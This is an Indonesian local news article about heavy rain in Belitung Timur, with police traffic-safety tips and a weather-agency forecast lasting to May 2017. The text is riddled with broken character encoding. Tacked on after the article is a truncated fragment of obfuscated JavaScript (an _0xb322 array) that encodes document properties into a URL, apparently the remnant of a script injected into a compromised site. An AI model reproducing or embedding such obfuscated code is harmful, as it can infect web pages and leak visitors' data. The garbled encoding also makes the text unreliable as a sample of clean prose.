Hujan Deras Bakal Terus Turun, Kasatlantas Polres Beltim Himbau Pengguna Jalan Hati-Hati

*Pejabat BMKG Tanjungpandan,ai??? Waspadai petir dan angin Kencang!ai???

KoranForum.Com, Manggar, Beltim — Kabupaten Belitung Timur Ai??(Beltim), khususnya Kecamatan Manggar dan sekitarnya, belakangan ini rutin diguyur Ai??hujan deras.

Setidaknya, beberapa hari terakhir Ai??ini, termasuk pada Senin (26/9) kemarin, hujan selalu turun pada siang hingga sore hari. Adapun daerah yang sering dilanda banjir atau menjadi langganan rutin kala hujan turun adalah, Dusun Sukamandi Kecamatan Damar.

Karena itu Kapolres Beltim AKBP Nono Wardoyo, S.IK, melalui Kasat Lantas Polres Beltim AKP Khoirudin HW, menghimbau kepada pengguna jalan, agar selalu hati hati dan selalu waspada.

Kasatlantas memberitahukan, sebaiknya pengguna jalan memperhatikan keselamatan, dengan mengikuti aturan berlalu lintas.Ai??Dijelaskan Kasatlantas, ada beberapa tips yang harus dilakukan pengguna jalan, pada saatAi??hujanAi??turun. Pertama, menghidupkan lampu agar jarak pandang antar pengguna jalan tetap terjaga. Kedua, mengurangi kecepatan kendaraan, ketika melewati genangan air.

“Ketiga, patuhi aturan lalu lintas, agar resiko kecelakaan bisa dihindari. Semuanya Ai??kembali kepada pengguna jalan, berkendaralah secara benar sesuai aturan,” sarannya.

Bagi pengendara roda dua, Kasatlantas juga menghimbau, agar melengkapi kendaraan dengan jasAi??hujan,Ai??yang bertujuan melindungi pengendara itu sendiri.

“Jangan lupa, periksa komponen sepeda motor seperti, lampu dan rem. Sebab, biasanya daya cengkram rem sedikit terganggu, kalau kondisiAi??lagi hujan,” pesan AKP Khoirudin.

Sementara itu, Kepala Kelompok Teknisi (KKT) BMKG Tanjung Pandan, Ridwanto, juga mengatakan, bahwa saat ini, Pulau Belitung sudah memasuki musim penghujan. Musim penghujan ini, diperkirakan akan berlangsung hingga Bulan Mei 2017 mendatang.

“Belitong ini sedang masuk musim penghujan. Tapi intensitas hujannya sedang. Biasanya, hujan bakal turun dari siang hingga ke sore harinya. Musim penghujan ini, diperkirakan akan berlangsung hingga bulan Mei 2017 mendatang,” ucap Ridwanto kepada wartawan, belum lama ini.

Saat ini, tambah Ridwanto, Belitong sedang permulaan musim hujan, atau peralihan dari kemarau ke musim penghujan. Adapun ada sejumlah hal yang harus diwaspadai pada masa ini, diantaranya adalah petir dan angin kencang.

“Waspada petir, angin kencang. Kalau daerah-daerah rawan banjir, itu lebih ke lingkungan, karena sebenarnya hujannya saat ini intensitasnya kategori sedang,” pungkasnya. (rianta)

Ai??

Ai??

Ai??

]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12])=== -1){alert(_0xb322[23])}

You May Also Like

Leave a Reply

Your email address will not be published. Required fields are marked *